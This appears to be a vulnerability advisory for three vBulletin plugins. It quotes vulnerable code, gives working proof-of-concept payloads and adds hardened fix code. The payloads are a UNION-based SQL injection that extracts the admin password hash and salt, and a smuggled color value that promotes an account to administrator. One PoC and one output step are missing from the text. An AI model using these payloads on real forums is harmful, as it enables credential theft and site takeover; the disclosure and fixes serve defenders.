vBulletin Verify Email Before Registration Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
Version: <= 2.0.6, patched in >= 2.0.7 (latest)

The vulnerability resides in the register_form_complete hook and in several other hooks of the plugin (listed below).
The first few lines of the register_form_complete hook:

if($so == 1){
	if($emailcode){
		// $emailcode comes straight from the request and is interpolated into the query without escaping
		$emailfromcode = $db->query_write("SELECT * FROM " . TABLE_PREFIX . "userregcode WHERE userregcode ='$emailcode';");

		if($db->num_rows($emailfromcode)){
			$emailfetched = $db->fetch_row($emailfromcode);
			$email = $emailconfirm = $emailfetched[1];
			$emailconfirmationcode = $emailcode;
		}else{
			eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
		}
	}
}
else{
	// registration code generated when no code was submitted
	$code = md5(time()*rand());
}

The user input data is not sanitized before being used in queries. In this case we can exploit the $emailcode variable.

Proof of concept:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1

Now look at the source of the page and find:


Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)
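
The same lookup with the user-supplied code cleaned and escaped before it reaches the query, as an added example of the fix (not the plugin's own code). It assumes the vBulletin 3.x/4.x input cleaner ($vbulletin->input->clean_array_gpc, TYPE_UINT, TYPE_STR) and $db->escape_string(), and assumes the stored registration code is the 32-character md5 hex string the else branch generates.

```php
<?php
// Added example, not the plugin's code: register_form_complete with $so and
// $emailcode taken through vBulletin's input cleaner and the code validated and
// escaped before it is interpolated into the SELECT.

// Cast $so to an unsigned int and take $emailcode as a plain string ('r' = request).
$vbulletin->input->clean_array_gpc('r', array(
    'so'        => TYPE_UINT,
    'emailcode' => TYPE_STR,
));
$so        = $vbulletin->GPC['so'];
$emailcode = $vbulletin->GPC['emailcode'];

if ($so == 1)
{
    if ($emailcode !== '')
    {
        // Assumption: the stored code is the md5 hex from the else branch, so
        // anything that is not 32 hex digits can be rejected before touching the DB.
        if (!preg_match('/^[0-9a-f]{32}$/', $emailcode))
        {
            eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
        }

        // Escape as a second line of defence; a SELECT belongs in query_read.
        $emailfromcode = $db->query_read("
            SELECT * FROM " . TABLE_PREFIX . "userregcode
            WHERE userregcode = '" . $db->escape_string($emailcode) . "'
        ");

        if ($db->num_rows($emailfromcode))
        {
            $emailfetched = $db->fetch_row($emailfromcode);
            $email = $emailconfirm = $emailfetched[1];
            $emailconfirmationcode = $emailcode;
        }
        else
        {
            eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
        }
    }
}
else
{
    $code = md5(time() * rand());
}
```

The same two steps (clean_array_gpc, then escape_string or a format check) apply to the email parameter in each of the other hooks listed above.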

vBulletin Point Market System Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232676
Version: 3.1.2 (latest)

The vulnerability resides in the pointmarket/market_purchase.php file.

One piece of code which is vulnerable, is the following:

// *********** Change User Name Glow *************
if ($itembuy[marketid] == 15 AND $error == 0) {
    if (!$color) {
        $error = 9; // User did not select a color.
    }
    if ($error == 0) {
        if ($method != 4) {
            // $color, $userid, $amount and even the column names $payment/$xperience are interpolated as-is
            $vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$payment`=$ppoints-$amount, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `$pamount`='$amount'");
            // vBExperience Addon
            if ($payment == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount, points_shop=points_shop+$amount where userid='$userid'");
            }
        } else {
            $vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$pointfield`=$points-$amount1, `$pointfield2`=$points2-$amount2, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `amount`='$amount', `amount2`='$amount2'");
            // vBExperience Addon
            if ($pointfield == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount1, points_shop=points_shop+$amount1 where userid='$userid'");
            }
            if ($pointfield2 == "market_xperience") {
                $vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount2, points_shop=points_shop+$amount2 where userid='$userid'");
            }
        }
    }
}

As you can see, many variables are not sanitized or checked before being inserted into the database. In this case we can abuse the $color variable. Since UPDATE statements are used, we can change the usergroup of our account to administrator and gain access to the admin control panel.

Note that in order to exploit this, you need access to the market and access to certain products in the market.

The following products, which you can buy in the market of this plugin, are vulnerable:
Change User Title Color, Change User Title Glow, Change User Name Color, Change User Name Glow, Post Font Face, Post Font Color, Thread Color.

Simply go to the product page and use any developer tool to change the value of the color/face POST value.

POST to:   http://example.com/market.php?do=purchase
POST data: payment1: 1
           item_id: 15
           color: 000000', usergroupid = '6
           securitytoken: yoursecuritytoken

Change the usergroupid to the usergroupid of the administrator usergroup, which is usually 6.
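
The "Change User Name Glow" branch rewritten so that every interpolated value is either cast to a number or checked against an allow-list before the UPDATE is built, as an added example of the fix (not the plugin's own code). It assumes the vBulletin 3.x/4.x $vbulletin object; the list of point column names is an assumption, and the remaining queries in the branch need the same treatment.

```php
<?php
// Added example, not the plugin's code. Two points the vulnerable code misses:
// (1) $color is a string inside quotes, so it must be validated/escaped;
// (2) $payment is used as a column name inside backticks, where escape_string()
//     cannot help, so it must come from a fixed allow-list.
$allowed_point_columns = array('market_points', 'market_xperience'); // assumed names

$vbulletin->input->clean_array_gpc('p', array(
    'color'   => TYPE_STR,
    'item_id' => TYPE_UINT,
));
$color = $vbulletin->GPC['color'];

if ($itembuy['marketid'] == 15 AND $error == 0)
{
    // Accept only a plain 6-digit hex colour such as "000000"; anything that
    // could close the quote and append "usergroupid = ..." is rejected here.
    if (!preg_match('/^[0-9A-Fa-f]{6}$/', $color))
    {
        $error = 9; // User did not select a (valid) color.
    }
    if (!in_array($payment, $allowed_point_columns, true))
    {
        $error = 9; // unknown point column (hypothetical reuse of the error code)
    }

    if ($error == 0 AND $method != 4)
    {
        $userid  = intval($userid);
        $amount  = intval($amount);
        $ppoints = intval($ppoints);

        // Identifier from the allow-list, numbers cast, string escaped.
        $vbulletin->db->query_write("
            UPDATE " . TABLE_PREFIX . "user
            SET `" . $payment . "` = " . ($ppoints - $amount) . ",
                market_purchases = market_purchases + 1,
                market_username_glow = '" . $vbulletin->db->escape_string($color) . "'
            WHERE userid = " . $userid
        );
        // The market_transactions INSERT and the vBExperience UPDATE that follow
        // in the original take the same cast/escape treatment.
    }
}
```

Because usergroupid is never part of this statement, no value submitted in the purchase form can reach it once the colour is confined to six hex digits.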

vBulletin SCANU’s vBFinder Plugin – Authorization Bypass

Plugin: http://www.vbulletin.org/forum/showthread.php?t=299490
Version: <= 0.2 (latest)

The mistake in this plugin is that the author did not add any checks in the connecter file: it does not check whether the user is currently logged in as an administrator. We can simply exploit this by making a .html file and pointing all URL references to the admincp of a forum with this plugin.

Proof of concept:

Loading…

This will establish a connection to the vulnerable host and will pop-up the file manager.
You can now download/upload/delete anything you want and browse through all of the files.
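
A guard for the top of the connector file that stops the request unless an administrator session is present, the action arrives via POST with vBulletin's security token, and the requested path stays inside the installation, as an added example (not the plugin's own code). It assumes vBulletin 3.x/4.x behaviour: global.php populates $vbulletin->userinfo, defines DIR, rejects POSTs with an invalid 'securitytoken', and exposes the admin permission bitfield bf_ugp_adminpermissions['cancontrolpanel']; the 'action' and 'path' parameters are hypothetical names.

```php
<?php
// Added example, not the plugin's code: authorization and request checks for
// the connector file. Assumes vBulletin 3.x/4.x as described in the lead-in.

require_once('./global.php');

// No admin session: stop before any file-system code runs.
if (!($vbulletin->userinfo['permissions']['adminpermissions']
      & $vbulletin->bf_ugp_adminpermissions['cancontrolpanel']))
{
    print_no_permission();
}

// State-changing actions only over POST, so a link or form on a foreign page
// cannot trigger them without the securitytoken global.php has validated.
if ($_SERVER['REQUEST_METHOD'] !== 'POST')
{
    header('HTTP/1.1 405 Method Not Allowed');
    exit;
}

$vbulletin->input->clean_array_gpc('p', array(
    'action' => TYPE_STR,   // hypothetical parameter name
    'path'   => TYPE_STR,   // hypothetical parameter name
));

// Confine every path to the forum root (DIR) so the file manager cannot be
// pointed at anything outside the installation directory.
$root = realpath(DIR);
$path = realpath($root . '/' . $vbulletin->GPC['path']);
if ($path === false OR strpos($path, $root . DIRECTORY_SEPARATOR) !== 0)
{
    exit('Invalid path');
}

// ... dispatch on $vbulletin->GPC['action'] using $path only from here on.
```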